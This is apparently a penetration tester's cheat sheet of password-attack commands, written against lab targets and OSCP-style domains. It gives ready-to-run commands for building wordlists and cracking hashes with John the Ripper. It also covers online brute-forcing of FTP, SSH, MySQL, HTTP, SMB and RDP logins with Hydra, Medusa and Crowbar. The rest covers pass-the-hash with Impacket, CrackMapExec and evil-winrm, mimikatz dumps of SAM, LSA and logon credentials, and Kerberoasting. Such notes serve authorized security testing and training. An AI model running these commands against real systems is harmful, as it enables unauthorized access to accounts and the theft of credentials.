Skip to content

Passwords

Passwords GPLv3 license

Lists

SecList 

#Clean
for i in $(find . -name "*.txt");do sed -i 's/^\#.*$//g' $i;done
for i in $(find . -name "*.txt");do sed -i '/^$/d' $i;done
CeWL 
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt # search 6 length
cewl https://esgeeks.com/ -n -e # emails
cewl https://esgeeks.com/ -c # contar palabras repetidas
cewl https://esgeeks.com/ -d 3 # incrementar profundidad
cewl http://testphp.vulnweb.com/ --with-numbers # generacion alphanumerica
cewl  --auth_type Digest --auth_user admin --auth_pass password -v # basic auth

Crunch 

crunch 8 8 -t ,@@^^%%%

Many Passwords

WpScan

wpscan --url http://$ip/ -U /tmp/users.txt  -P /opt/wordlists/SecLists/Passwords/*/rockyou.txt --password-attack wp-login
wpscan --url sandbox.local --enumerate ap,at,cb,dbe,u

John The Ripper

John 

#Mutated list
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt

#NTLM
john --wordlist=passfile.txt hash.txt --format=NT --fork=8
john --show hash.txt --format=NT

#RarFile
rar2john flag.rar
flag.rar:$rar5$16$af331c442209e01c1d9abf8a9652c1d5$15$701e045b57d1c4c148e9738296956231$8$b51fc8fb1fa493f4

#ZipFile
zip2john flag.zip

#shadow 
unshadow passwd shadow > filetocrack

#Kirbi
kirbi2john.py file.kirbi > hash

#PFX
pfx2john file.pfx > hash

RSA Private Key 

$ python ssh2john.py lala.key > hashlala
$ john --wordlist=/usr/share/wordlists/rockyou.txt hashlala

Hydra

hydra -v -V -F -L users.txt -P rockyou.txt -t 30 ftp://192.168.1.135
hydra -l megan -P rockyou.txt ssh://10.10.10.60 -t 8
hydra -t 5 -V -f -L users.txt -e ns -P pasess.txt 192.168.1.135 mysql
hydra -L usernames.txt -P rockyou.txt -s 80 -f 192.168.1.135 http-get /sev-home #simple auth login
hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
hydra -l root@localhost -P /opt/SecLists/rockyou.txt 10.11.1.39 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I

Medusa

#basic auth http
medusa -h 10.11.0.22 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
#SMB
medusa -h 192.168.229.10 -u admin -P passfile.txt -M smbnt

Fcrackzip

fcrackzip -v -u -D -p 'rockyou.txt' hammer.zip

Crowbar

crowbar -b rdp -s 192.168.229.10/32 -u admin -C passfile.txt -n 1

PassTheHash

#PTH
pth-winexe -U admin%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.229.10 cmd

#Impacket
wmiexec.py -hashes :2892d26cdf84d7a70e2eb3b9f05c425e administrator@192.168.229.10

#CrackMapExec
crackmapexec smb 192.168.229.10/24 -u offsec -H 2892d26cdf84d7a70e2eb3b9f05c425e

#EvilWinRM
evil-winrm -i 192.168.229.10 -u offsec -H 2892d26cdf84d7a70e2eb3b9f05c425e

mimikatz

Dump SAM 

privilege::debug
token::elevate
lsadump::sam
lsadump::lsa /patch

Logged Users 

privilege::debug
sekurlsa::logonpasswords

Kerberos 

sekurlsa::tickets
kerberos::list /export

Overpass the hash 

sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:2892d26cdf84d7a70e2eb3b9f05c425e /run:PowerShell.exe

Without mimikatz 

#Invoke-Kerberoast
Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt

Tgsrepcrack

#Solicitar ticket de servicio
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com'

#crack
tgsrepcrack.py wordlist.txt file.kirbi